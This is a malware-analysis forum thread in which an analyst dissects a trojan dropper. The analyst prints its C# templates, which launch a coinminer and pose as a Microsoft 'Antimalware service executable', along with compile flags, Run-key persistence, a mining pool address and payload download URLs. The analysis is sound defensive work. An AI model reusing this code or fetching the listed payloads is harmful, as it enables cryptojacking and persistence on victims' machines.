A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #32419  by hackr8
 Thu Jan 10, 2019 4:45 pm
This file is detected as many different things and that really confused me.
Can someone find what it actually is?
This file is according to VT a:
1.Generic
2.Riskware
3.CoinMiner
4.Trojan
5.PUA
6.Hack Tool

dl: hxxp://b.reich.io/rxipyy.exe

Virus Total (49/69): https://www.virustotal.com/#/file/13ee1 ... 17/details
Attachments
password: infected
(599.66 KiB) Downloaded 27 times
 #32422  by EP_X0FF
 Fri Jan 11, 2019 1:04 pm
At first this is trojan muldrop. It contain resource dll with C# source code that is modified by dropper and then compiled with csc.exe in runtime. Additionally it creates multiple embedded directories with pseudo-random names to store it files.

The source dll has 2 templates:
Code: Select all
using System;
using System.Diagnostics;
using Microsoft.Win32;
using System.Drawing;
using System.IO;
using System.Reflection;
[assembly: AssemblyTitle("{GETNAME]")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("{GETCOMPANY]")]
[assembly: AssemblyProduct("{GETPRODUCT]")]
[assembly: AssemblyCopyright("Copyright В©  2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
namespace IconStealer
{
    class Program
    {
        static void Main(string[] args)
        {
            string appexe= @"((APPEXE))";
            string wdir=@"((WDIR))";
            if (File.Exists(appexe))
            {
                Process miner = new Process();
                miner.StartInfo.FileName = appexe;
                miner.StartInfo.UseShellExecute = true;
                miner.StartInfo.WorkingDirectory = wdir;
                miner.Start();
            }
        }
    }
}

using System;
using System.Threading;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTitle("Antimalware service executable")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Microsoft Corporation")]
[assembly: AssemblyProduct("Antimalware service executable")]
[assembly: AssemblyCopyright("Copyright В©  2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
namespace Valhalla
{
    class Class1
    {
        static void Main(string[] args)
        {
			if (InstanceCheck())
            {
                Process defender = Process.GetCurrentProcess();
                defender.Kill();
            }
            string appdata = @"((APPEXE))";
			  string wdir=@"((WDIR))";
			Process miner;
            while (true)
            {
                Thread.Sleep(100);
                if (check())
                {
				try{
					miner=new Process();
					miner.StartInfo.FileName = appdata;
					miner.StartInfo.UseShellExecute=false;
					miner.StartInfo.WorkingDirectory=wdir;
                    miner.Start();
				}catch{}
                }
            }
        }

        static bool InstanceCheck()
        {
			Process[] defender = Process.GetProcessesByName("((DEFEXE))");
            if (defender.Length>1)
            {
                return true;
            }
            else
            {
                return false;
            }
        }
        static bool check()
        {
            Process[] minr = Process.GetProcessesByName("((HOSTEXE))");
            if (minr.Length==0)
            {
                return true;
            }
            else
            {
                return false;
            }
        }
    }
} 
One of the templates after runtime modification looks like this:
Code: Select all
using System;
using System.Threading;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTitle("Antimalware service executable")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Microsoft Corporation")]
[assembly: AssemblyProduct("Antimalware service executable")]
[assembly: AssemblyCopyright("Copyright ©  2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
namespace Valhalla
{
    class Class1
    {
        static void Main(string[] args)
        {
			if (InstanceCheck())
            {
                Process defender = Process.GetCurrentProcess();
                defender.Kill();
            }
            string appdata = @"C:\RecoveryLog\2hc4tp\73dcn\7bp8choxq\a67y6h6wb6phi9\m8gusmmezip78c6\v2xa7utij6a\2ikja86k4fntx4f\vl8g2acbcbel3in\hostsys.exe";
			  string wdir=@"C:\RecoveryLog\2hc4tp\73dcn\7bp8choxq\a67y6h6wb6phi9\m8gusmmezip78c6\v2xa7utij6a\2ikja86k4fntx4f\vl8g2acbcbel3in\";
			Process miner;
            while (true)
            {
                Thread.Sleep(100);
                if (check())
                {
				try{
					miner=new Process();
					miner.StartInfo.FileName = appdata;
					miner.StartInfo.UseShellExecute=false;
					miner.StartInfo.WorkingDirectory=wdir;
                    miner.Start();
				}catch{}
                }
            }
        }

        static bool InstanceCheck()
        {
			Process[] defender = Process.GetProcessesByName("consystem");
            if (defender.Length>1)
            {
                return true;
            }
            else
            {
                return false;
            }
        }
        static bool check()
        {
            Process[] minr = Process.GetProcessesByName("hostsys");
            if (minr.Length==0)
            {
                return true;
            }
            else
            {
                return false;
            }
        }
    }
}
And compiled with the following params:
Code: Select all
/t:exe /utf8output /R:"System.dll" /R:"mscorlib.dll" /out:"C:\RecoveryLog\1oejmr3i\886ykx44c6\bvnam1zw\469ndl\xt88mcv1\consystem.exe" /debug- /optimize+ /t:winexe  "C:\Users\<user>\AppData\Local\Temp\0hutooe1.0.cs"
Autostart registered via HKCU Run key.

Names of dropper and "self-protect" application hardcoded.

The payload of all this C# idiocy is a coinminer, configured this way
Code: Select all
stratum+tcp://xmr.pool.minergate.com:45560  balanc3r@tuta.io
and downloaded from (likely this trojan) author created github page
Code: Select all
https://github.com/ventriano/vent/blob/master/CPU32.zip?raw=true
(https://www.virustotal.com/en/file/cd38 ... /analysis/)

Warning: everything from this repository should be considered risky.
 #32425  by hackr8
 Fri Jan 11, 2019 2:44 pm
EP_X0FF wrote: Fri Jan 11, 2019 1:04 pm
But how did you find the source code? It is obvisously obfuscated.
CodeReflect gave me this when I tried to decompile it:
Code: Select all
Shared Sub NULL-SHIELD_Stop-unpacking-this-tool||You_can_not_unpack_this_programáâãäåæçèéêë7qìKîïðñ7qóôõö÷øùNULL-SHIELD_Stop-unpacking-this-tool-<Module>You_can_not_unpack_this_program||NULL-SHIELD_Stop-unpacking-this-tool()

End Sub
 #32428  by EP_X0FF
 Fri Jan 11, 2019 4:40 pm
With help of own designed physical memory analysis tool. All these obfuscators produce original data/code in the runtime, otherwise nothing will work.